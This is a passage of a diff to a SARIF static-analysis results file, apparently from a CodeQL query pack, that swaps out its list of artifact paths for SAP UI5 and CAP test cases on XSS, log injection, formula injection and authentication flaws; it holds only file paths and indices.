295 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 296 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 297 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 298 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 299 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 300 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 301 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 302 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 303 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 304 - } - }, { + } ], + "executionSuccessful" : true + } ], + "artifacts" : [ { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", 
"uriBaseId" : "%SRCROOT%", - "index" : 305 + "index" : 0 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 306 + "index" : 1 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 307 + "index" : 2 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 308 + "index" : 3 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 309 + "index" : 4 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 310 + "index" : 5 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 311 + "index" : 6 } }, { 
"location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 312 + "index" : 7 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 313 + "index" : 8 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 314 + "index" : 9 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 315 + "index" : 10 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 316 + "index" : 11 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 317 + "index" : 12 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", + 
"uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 318 + "index" : 13 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 319 + "index" : 14 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 320 + "index" : 15 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 321 + "index" : 16 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 322 + "index" : 17 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 323 + "index" : 18 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 324 + "index" : 19 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 325 + "index" : 20 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 326 + "index" : 21 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 327 + "index" : 22 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 328 + "index" : 23 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 329 + "index" : 24 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", 
"uriBaseId" : "%SRCROOT%", - "index" : 330 + "index" : 25 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 331 + "index" : 26 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 332 + "index" : 27 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 333 + "index" : 28 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 334 + "index" : 29 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 335 + "index" : 30 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 336 + "index" : 31 } }, { "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 337 + "index" : 32 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 338 + "index" : 33 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 339 + "index" : 34 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 340 + "index" : 35 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 341 + "index" : 36 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 342 + "index" : 37 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 343 + "index" : 38 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 344 + "index" : 39 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 345 + "index" : 40 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 346 + "index" : 41 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 347 + "index" : 42 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 348 + "index" : 43 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - 
"index" : 349 + "index" : 44 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 350 + "index" : 45 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 351 + "index" : 46 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 352 + "index" : 47 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 353 + "index" : 48 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 354 + "index" : 49 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 355 + "index" : 50 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", 
"uriBaseId" : "%SRCROOT%", - "index" : 356 + "index" : 51 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 357 + "index" : 52 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 358 + "index" : 53 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", "uriBaseId" : "%SRCROOT%", - "index" : 359 + "index" : 54 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", "uriBaseId" : "%SRCROOT%", - "index" : 360 + "index" : 55 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", "uriBaseId" : "%SRCROOT%", - "index" : 361 + "index" : 56 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 362 + "index" : 57 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 363 + "index" : 58 } }, { "location" : { 
- "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", "uriBaseId" : "%SRCROOT%", - "index" : 364 + "index" : 59 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", "uriBaseId" : "%SRCROOT%", - "index" : 365 + "index" : 60 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 366 + "index" : 61 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 367 + "index" : 62 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 368 + "index" : 63 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 369 + "index" : 64 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 370 + "index" : 65 } }, { 
"location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 371 + "index" : 66 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 372 + "index" : 67 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 373 + "index" : 68 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 374 + "index" : 69 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 375 + "index" : 70 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 376 + "index" : 71 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : 
"%SRCROOT%", - "index" : 377 + "index" : 72 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 378 + "index" : 73 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 379 + "index" : 74 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 380 + "index" : 75 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 381 + "index" : 76 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 382 + "index" : 77 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 383 + "index" : 78 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 384 + "index" : 79 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 385 + "index" : 80 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 386 + "index" : 81 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 387 + "index" : 82 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 388 + "index" : 83 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 389 + "index" : 84 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 390 + "index" : 85 } }, { "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 391 + "index" : 86 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 392 + "index" : 87 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 393 + "index" : 88 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 394 + "index" : 89 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 395 + "index" : 90 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 396 + "index" : 91 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", 
